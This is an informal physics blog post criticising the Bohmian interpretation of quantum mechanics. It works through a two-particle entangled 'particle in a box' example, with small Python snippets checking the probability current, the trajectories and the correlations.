Now, I have been in Munich for over ten years. And here at the LMU math department there is a group calling themselves the Workgroup Mathematical Foundations of Physics. And, let's be honest, I call them the Bohmians (and sometimes the Bohemians). And once more, most people believe that the Bohmian interpretation of quantum mechanics is just a fringe approach that is not worth wasting any time on. You will have guessed it already: I did it nonetheless. So here is a condensed report of what I learned and what I think should be the official opinion on this approach. This is an informal write-up of a note that I put on the arXiv today.

What Bohmians dislike about the usual (termed Copenhagen, for lack of a better word) approach to quantum mechanics is that you are not allowed to talk about so many things and that the observer plays such a prominent role, determining via a measurement what aspect is real and what is not. They think this is far too subjective. So instead, they want quantum mechanics to be about particles that are then allowed to follow trajectories.

"But we know this is impossible!" I hear you cry. So let's see how this works. The key observation is that the Schrödinger equation for a Hamilton operator of the form kinetic term (possibly with a magnetic field) plus potential term has a conserved current

$$j = -i\left(\bar\psi\nabla\psi - (\nabla\bar\psi)\psi\right).$$

So, as your probability density is $\rho=\bar\psi\psi$, you can think of it as being made up of particles moving with a velocity field

$$v = j/\rho = 2\Im(\nabla \psi/\psi).$$

What this buys you is equivariance: if you have a bunch of particles that are initially distributed like the probability density and follow the flow of the velocity field, they will also later be distributed like $|\psi |^2$.
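As a sanity check, the conservation of this current can be verified numerically in one dimension. This is my own sketch, in units where the free Schrödinger equation reads $i\psi_t = -\psi_{xx}$ and the current is normalized so that $v = 2\Im(\psi'/\psi)$:

```python
import numpy as np

# Numerical check (a sketch, not from the paper) that d(rho)/dt + dj/dx = 0
# for the free Schroedinger equation, in units where it reads i psi_t = -psi_xx
# and with the current normalized so that v = j/rho = 2 Im(psi'/psi).
x = np.linspace(-8.0, 8.0, 4001)
dx = x[1] - x[0]
psi = np.exp(-x**2 / 2) * np.exp(1j * 1.3 * x)  # arbitrary smooth test state

d = lambda f: np.gradient(f, dx)                # finite-difference d/dx
psi_x = d(psi)
psi_xx = d(psi_x)

psi_t = 1j * psi_xx                             # Schroedinger: i psi_t = -psi_xx
rho_t = 2 * np.real(np.conj(psi) * psi_t)       # d/dt of rho = |psi|^2
j = (-1j * (np.conj(psi) * psi_x - np.conj(psi_x) * psi)).real

residual = rho_t + d(j)                         # continuity equation
print(np.max(np.abs(residual[1000:-1000])))     # ~ 0 up to discretization error

# the Bohmian velocity field for this state: the Gaussian envelope is real,
# so only the plane-wave factor contributes and v is constant
v = 2 * np.imag(psi_x / psi)
```

For this Gaussian-times-plane-wave test state the velocity field comes out as the constant $2k = 2.6$, the plane-wave drift in these units.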

What is important is that they keep the Schrödinger equation intact. So everything that you can do with the original Schrödinger equation (i.e. everything) can be done in the Bohmian approach as well. If you set up your Hamiltonian to describe a double-slit experiment, the Bohmian particles will flow nicely to the screen and arrange themselves in interference fringes (as the probability density does). So you will never encounter a situation where any experimental outcome differs from what the Copenhagen prescription predicts.
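To see the particles actually follow the flow, here is a small trajectory integration (again my own sketch, in units where the free equation reads $i\psi_t = -\psi_{xx}$ so that $v = 2\Im(\psi'/\psi)$): a Gaussian evolves freely (exactly, via the Fourier-space propagator) and a fan of Bohmian particles is transported with $dx/dt = v$. For $\psi_0 = e^{-x^2}$ one finds analytically that each trajectory is simply rescaled by the spreading width, $x(t) = x(0)\sqrt{1+16t^2}$, and the numerics reproduce this:

```python
import numpy as np

# Sketch (my own, not from the post): Bohmian trajectories for a spreading
# Gaussian.  Free evolution is exact in Fourier space:
# psi_hat(t) = exp(-i k^2 t) psi_hat(0)   (units with i psi_t = -psi_xx).
N, L = 4096, 40.0
x = (np.arange(N) - N // 2) * (L / N)
k = 2 * np.pi * np.fft.fftfreq(N, d=L / N)
psi0_hat = np.fft.fft(np.exp(-x**2))        # psi(x,0) = exp(-x^2), no nodes

def velocity(t, xs):
    prop = np.exp(-1j * k**2 * t)
    psi = np.fft.ifft(prop * psi0_hat)
    dpsi = np.fft.ifft(1j * k * prop * psi0_hat)
    return np.interp(xs, x, 2 * np.imag(dpsi / psi))  # v = 2 Im(psi'/psi)

# integrate dx/dt = v for a fan of initial positions (Euler is enough here)
xs0 = np.array([-2.0, -1.0, -0.5, 0.5, 1.0, 2.0])
xs, dt = xs0.copy(), 0.001
for n in range(1000):
    xs = xs + dt * velocity(n * dt, xs)

# analytically x(t) = x(0) * sqrt(1 + 16 t^2) for this state:
print(xs / xs0)                # each ratio ~ sqrt(17) ~ 4.12 at t = 1
```

Note also that the trajectories never cross: the ordering of the particles is preserved, as it must be for a single-valued velocity field.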

The price you have to pay, however, is that you end up with a very non-local theory: the velocity field lives on configuration space, so the velocity of every particle depends on the positions of all the other particles in the universe. I would say this is already a showstopper (given what we know about quantum field theory, whose raison d'être is locality), but let's ignore this aesthetic concern.

What got me into this business was the attempt to understand how set-ups like Bell's inequality, GHZ and the like work out in this picture; they are supposed to show that quantum mechanics cannot be classical (technically, that the state space cannot be described by local probability densities). The problem with those is that they are often phrased in terms of spin degrees of freedom, whose Hamiltonians are not directly of the form above. You can use a Stern-Gerlach-type apparatus to translate the spin degree of freedom into a positional one, but at the price of a Hamiltonian that is not explicitly known, let alone one for which you can analytically solve the Schrödinger equation. So you don't see much.

But from Reinhard Werner and collaborators I learned how to set up qubit-like algebras from positional observables of free particles (at different times, so you get something non-commuting, which you need to make use of entanglement as a specific quantum resource). So here is my favourite example:

You start with two particles, each following a free time evolution but confined to an interval. You set those up in a particular entangled state (stationary, as it is an eigenstate of the Hamiltonian) built from the two lowest levels of the particle in a box. Then you observe, for each particle, whether it is in the left or the right half of the interval.

From symmetry considerations (details in my paper) you can see that each particle is found with equal probability on the left and on the right. When measured at the same time, the two are anti-correlated. But when measured at different times, the correlation oscillates like the cosine of the time difference.
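The cosine correlation can be checked in a small toy computation (my reconstruction, not the code from the paper). Since bra and ket only involve the two lowest levels, only the single matrix element $\langle 1|s|2\rangle$ of the left/right sign observable enters, and a short Heisenberg-picture computation gives $\langle s_x(t_1) s_y(t_2)\rangle = -s_{12}^2 \cos(\omega(t_1-t_2))$ with $\omega = E_2 - E_1$:

```python
import numpy as np

# Toy check (my reconstruction) of the cosine correlation.  Box [0,1],
# levels phi_n(x) = sqrt(2) sin(n pi x), entangled state (|12> - |21>)/sqrt(2),
# observable s = sign(x - 1/2).  Diagonal matrix elements of s vanish by
# symmetry, so only <1|s|2> enters.
x = np.linspace(0.0, 1.0, 200001)
dx = x[1] - x[0]
phi = lambda n: np.sqrt(2.0) * np.sin(n * np.pi * x)
s = np.sign(x - 0.5)

s12 = np.sum(phi(1) * s * phi(2)) * dx   # analytically -8/(3 pi) ~ -0.849

# In the Heisenberg picture s(t)_12 = s12 * exp(i (E1 - E2) t), giving
#   <s_x(t1) s_y(t2)> = -s12^2 * cos(omega (t1 - t2)),
# with omega = E2 - E1 in units where E_n = (n pi)^2.
omega = (2 * np.pi) ** 2 - np.pi ** 2

def corr(t1, t2):
    return -s12**2 * np.cos(omega * (t1 - t2))

print(corr(0.0, 0.0))               # equal times: ~ -0.72, anti-correlated
print(corr(0.0, np.pi / omega))     # half a period later: sign flipped
```

The equal-time value $-64/(9\pi^2) \approx -0.72$ is the anti-correlation the symmetry argument predicts, and shifting one measurement by half a period flips its sign.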

From the Bohmian perspective, the velocity field of the static initial state vanishes everywhere; nothing moves. But in order to capture the time-dependent correlations, as soon as one particle has been measured, the position of the second particle has to oscillate in the box. (How the measurement works in detail is not specified in the Bohmian approach, since it involves other degrees of freedom and, remember, everything depends on everything. But somehow it has to work, since you want to reproduce the correlations predicted by the Copenhagen approach.)

[Figure: the trajectory of the second particle, depending on its initial position]

This is somehow the Bohmian version of the collapse of the wave function, but they would never phrase it that way.

And here is where it becomes problematic: If you could see the Bohmian particle moving, you could tell whether the other particle has been measured (it would oscillate) or not (it would stand still), no matter how far away the other particle is. With this observation you could build a telephone that transmits information instantaneously, something that should not exist. So you have to conclude that you must not be able to watch the second particle and see whether it oscillates or not.

Bohmians tell you that you cannot, because all you are supposed to observe about the particles is their positions (and not their velocities). And if you try to measure the velocity by measuring the position at two instants in time, you fail, because the first observation disturbs the particle so much that it invalidates the original state.

As it turns out, you are not allowed to observe anything else about the particles than that they are distributed like $|\psi |^2$, because if you could, you could build a similar telephone (at least statistically), as I explain in the paper (this fact is known in the Bohmian literature, but I have found it nowhere demonstrated as clearly as in this two-particle system).

My conclusion is that the Bohmian approach adds something (the particle positions) to the wave function, but then in the end tells you that you are not allowed to observe it or have any knowledge of it beyond what is already encoded in the wave function. It's like making up an invisible friend.

PS: If you haven't seen "Bohemian Rhapsody", yet, you should, even if there are good reasons to criticise the dramatisation of real events.